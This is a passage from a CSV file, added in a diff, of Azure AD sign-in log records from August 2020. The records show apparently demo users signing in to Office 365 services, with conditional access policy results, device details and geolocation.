'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 14:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",dfda3bbc-b55b-4a89-a1fb-2fc0c2580f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,dfda3bbc-b55b-4a89-a1fb-2fc0c2580f00,SigninLogs,Sucess,33.7984581,-84.38828278
+1944,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:40.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5374abba-89aa-4501-9fe6-5fbdfae62cee,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office 365 Portal,00000006-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:55,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",3f80e775-4028-4bc5-9e8b-649b26930f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,3f80e775-4028-4bc5-9e8b-649b26930f00,SigninLogs,Sucess,33.7984581,-84.38828278
+1945,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:08.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,67c7469f-40d8-0000-4704-adee27fc5bb5,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 14:55,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",34a4214f-a676-41f3-9bb4-26faa4980f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,34a4214f-a676-41f3-9bb4-26faa4980f00,SigninLogs,Sucess,33.7984581,-84.38828278
+1946,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:40.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5374abba-89aa-4501-9fe6-5fbdfae62cee,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office 365 Portal,00000006-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:55,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",34a4214f-a676-41f3-9bb4-26fa419d0f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,34a4214f-a676-41f3-9bb4-26fa419d0f00,SigninLogs,Sucess,33.7984581,-84.38828278
+1947,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,13:27.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9aab22a4-85de-4d82-a698-eb694978d42a,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Dynamics 365 Portal,bab47555-038a-4434-a931-96cc6091cdd7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:13,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",325d7c9c-ae51-4f5f-a5f7-8aa485941000,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,325d7c9c-ae51-4f5f-a5f7-8aa485941000,SigninLogs,Sucess,50.6406517,5.572050095
+1948,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,41:55.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a6c6469f-0031-0000-5683-46d8d582f4ee,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 14:41,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",e9cfabe1-d666-446f-aeb7-581772651100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,e9cfabe1-d666-446f-aeb7-581772651100,SigninLogs,Sucess,33.7984581,-84.38828278
+1949,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:30.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,99b34af1-2631-43d0-8b58-373383cb9f59,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,O365 Suite UX,4345a7b9-9a63-4910-a426-35363201d503,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:55,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",189268ff-d871-4dc4-914e-2c967a571100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,189268ff-d871-4dc4-914e-2c967a571100,SigninLogs,Sucess,33.7984581,-84.38828278
+1950,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:37.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,7f20db42-14bc-49cf-8d3d-e75552278db6,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:55,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",189268ff-d871-4dc4-914e-2c9681581100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,189268ff-d871-4dc4-914e-2c9681581100,SigninLogs,Sucess,33.7984581,-84.38828278
+1951,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:03.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5b1b6256-f9a8-42ee-addf-6e38b1581b5e,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 